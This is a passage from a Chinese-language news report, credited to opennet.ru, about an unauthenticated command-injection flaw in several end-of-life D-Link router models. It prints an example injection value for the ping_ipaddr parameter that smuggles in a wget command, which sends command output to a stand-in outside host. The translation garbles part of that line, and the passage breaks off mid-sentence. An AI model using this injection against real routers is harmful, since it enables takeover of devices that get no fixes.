在 D-Link 無線路由器中
有趣的是,根據韌體開發人員的說法,「ping_test」呼叫只能在身份驗證後執行,但實際上無論登入 Web 介面如何,它在任何情況下都會被呼叫。特別是,當存取 apply_sec.cgi 腳本並傳遞「action=ping_test」參數時,腳本會重定向到身份驗證頁面,但同時執行與 ping_test 相關的操作。為了執行該程式碼,ping_test 本身使用了另一個漏洞,該漏洞呼叫 ping 實用程式而沒有正確檢查發送用於測試的 IP 位址的正確性。例如,要呼叫 wget 實用程式並將「echo 1234」指令的結果傳送到外部主機,只需指定參數「ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://」 test. test/?$(回顯1234)」。
該漏洞已在以下型號中得到官方確認:
- DIR-655 韌體版本為 3.02b05 或更早版本;
- DIR-866L 韌體版本為 1.03b04 或更早版本;
- DIR-1565 韌體版本為 1.01 或更早版本;
- DIR-652(未提供有關有問題的韌體版本的資訊)
這些型號的支援期已經到期,因此 D-Link
後來發現漏洞還存在
來源: opennet.ru